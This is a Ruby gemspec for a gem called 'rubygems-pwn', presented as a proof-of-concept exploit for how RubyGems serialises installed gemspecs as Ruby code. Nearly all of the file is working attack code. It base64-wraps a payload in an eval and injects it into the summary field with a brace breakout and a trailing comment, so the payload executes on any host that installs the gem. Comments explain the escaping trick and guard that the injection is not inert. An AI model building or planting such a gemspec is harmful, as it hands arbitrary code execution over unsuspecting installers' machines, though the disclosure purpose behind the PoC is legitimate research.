1 # -*- encoding: utf-8 -*-
2
3 require 'base64'
4
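Gem::Specification.new do |s|
  s.name = "rubygems-pwn"
  s.version = "0.1.0"
  s.authors = ["Postmodern"]
  s.email = ["postmodern.mod3@gmail.com"]
  s.homepage = "http://github.com/sophsec/rubygems-pwn"

  # The Ruby that will run on the installing host once this gem is installed.
  # It is read when the gemspec itself is loaded; a missing file raises
  # Errno::ENOENT here instead of quietly producing an empty injection.
  payload = File.read(File.join(File.dirname(__FILE__), 'lib', 'rubygems-pwn', 'payload.rb'))

  # Wrap the payload in a single-line Ruby expression that decodes and evals
  # it. Base64 keeps braces, quotes and newlines out of the literal that ends
  # up inside the %q{...} string RubyGems generates (see escape_code below).
  # The strict variant emits no line breaks, so the embedded literal carries
  # no "\n" escapes; Base64.decode64 accepts either form. The eval is the
  # point of the PoC: it executes on the victim, not while this file loads.
  embed_code = lambda { |code|
    "require('base64');eval(Base64.decode64(#{Base64.strict_encode64(code).inspect}))"
  }

  # The RubyGems release this PoC targets serialises String attributes in
  # Gem::Specification#ruby_code by simply wrapping them in "%q{" and "}"
  # with no escaping of the value. Emitting "}" closes that literal early and
  # the trailing " #" comments out the "}" RubyGems appends, so everything in
  # between is evaluated as Ruby when the stored gemspec is loaded. Newer
  # RubyGems versions changed this escaping; verify against the target
  # version before relying on it.
  escape_code = lambda { |code|
    "}; #{code} #"
  }

  s.description = %q{A Proof of Concept (PoC) exploit for an trivial Security vulnerability in how RubyGems converts YAML-dumped gemspecs, back into Ruby code, when installing RubyGems. This ties into the larger design mistake, of storing installed gemspecs as Ruby code; since evaling Ruby code was faster than loading YAML gemspecs. When handling data, it is safer to store it in a static format (YAML, XML, CSV), instead of executable code.}

  # The summary is the description's first sentence followed by the escaped
  # injection. %q{} treats nested brace pairs as part of the literal, so the
  # prefix must not contain braces or the "}" from escape_code would not
  # terminate the string and the injection would be inert.
  first_sentence = s.description.match(/\A[^.]+/)[0]
  if first_sentence.include?('{') || first_sentence.include?('}')
    raise "summary prefix must not contain braces: the %q{} escape would not break out"
  end
  s.summary = first_sentence + escape_code[embed_code[payload]]

  s.files = ['README.rdoc']
  s.require_paths = ["lib"]
end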